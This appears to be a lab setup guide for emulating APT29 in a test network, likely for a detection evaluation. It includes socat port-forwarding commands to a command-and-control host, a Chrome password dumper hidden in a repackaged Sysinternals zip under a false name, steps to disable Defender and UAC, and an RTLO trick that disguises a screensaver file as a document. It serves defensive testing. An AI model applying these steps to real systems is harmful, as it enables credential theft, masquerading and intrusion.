#
Scenario 1 Infrastructure
We hope to capture the general structure of what is reported to have been seen being used by APT29. The infrastructure listed below is specific to Scenario 1. The requirements described herein should be considered a bare minimum to execute the scenario. If you have the time and resources to remain true-to-form, you may elect to stand up multiple of each of these servers, non-contiguous IP space, etc. If you are not concerned with emulating APT29 to this degree, this level of effort is not necessary. You could for instance, phish, serve payload, and exfil from/to the same server.
Please note that binary files hosted in Scenario_1 and Scenario_2 have been added to password protected zip files. The password for these files is "malware."
#
Emulation Team Infrastructure
Attack Platform: tested and executed on Ubuntu 18.04.3 LTS
Redirector: tested and executed on Ubuntu 18.04.3 LTS
Windows Attack Platform: Windows 10 x64 version 1903
Note: The Windows attack platform is only required if you would like to compile the Scenario 1 payloads. If you use the pre-compiled payloads, you do not need this system.
#
Emulation Team Infrastructure Configuration
This methodology assumes the following static IP address configurations:
#
A note about red team payloads
This evaluation utilizes four payloads that model APT29 malware.
The payloads are customized variants of reverse shells from Pupy RAT and Metasploit.
Pre-compiled payloads are available in the resources directory; however, they are configured to connect back to static IP addresses 192.168.0.5 and 192.168.0.4.
If you would like to build the payloads yourself, please see payload_configs.md for further instructions.
#
Setup Redirector: 192.168.0.5 (or the value used for the Redirector IP)
From the redirector system, setup port forwarding using Socat.
sudo socat TCP-LISTEN:443,fork TCP:192.168.0.4:443 & sudo socat TCP-LISTEN:1234,fork TCP:192.168.0.4:1234 & sudo socat TCP-LISTEN:8443,fork TCP:192.168.0.4:8443 &
#
Setup Attack Platform: 192.168.0.4
- Download Chrome password dumper tool from: https://github.com/adnan-alhomssi/chrome-passwords/raw/master/bin/chrome-passwords.exe
- Download SysInternals zip folder from: https://download.sysinternals.com/files/SysinternalsSuite.zip
- Unzip
SysinternalsSuite.zip; copy the following files into the SysInternalsSuite directory:readme.txtpsversion.txtchrome-passwords.exe(renamed asaccessChk.exe)strings64.exe(compiled fromhostui.cpp)
- Zip modified SysinternalsSuite folder
- Install Pupy and Metasploit on Attack Platform by running
install_day1_tools.sh - Start Pupy docker container then the EC4 listener
sudo pupy/start-compose.shlisten -a ec4
#
Target Infrastructure
- 3 targets
- 1 domain controller and 2 workstations
- All Windows OS (tested and executed against Win10 1903)
- Domain joined
- Same local administrator account on both Windows workstations
- Google Chrome Web Browser must be available on one of the victim workstations
#
Target Infrastructure Configuration
#
For each of the 2 target workstations
- Login in as user with administrator privileges
- Ensure Windows Defender is off or configured to alert-only
- Set UAC to never notify (https://articulate.com/support/article/how-to-turn-user-account-control-on-or-off-in-windows-10)
- Verify user has read/write/execute permissions in the C:\Windows\Temp directory
- Install Google Chrome (https://www.google.com/chrome/); cache credentials in Chrome password manager
- Import-PFX certificate found in shockwave.local.pfx. Instructions below:
#
Import PFX Certificate
Step 6.B of this emulation models theft of Private Keys.
Copy the PFX certificate located in the shockwave.local.pfx file to the Windows victims.
Import the certificate using PowerShell:
Import-PfxCertificate -Exportable -FilePath "shockwave.local.pfx" -CertStoreLocation Cert:\LocalMachine\My
#
Add RTLO character and place rcs.3aka3.doc on Windows Victim-1
- See payload_configs.md for instructions on how to update cod.3aka3.scr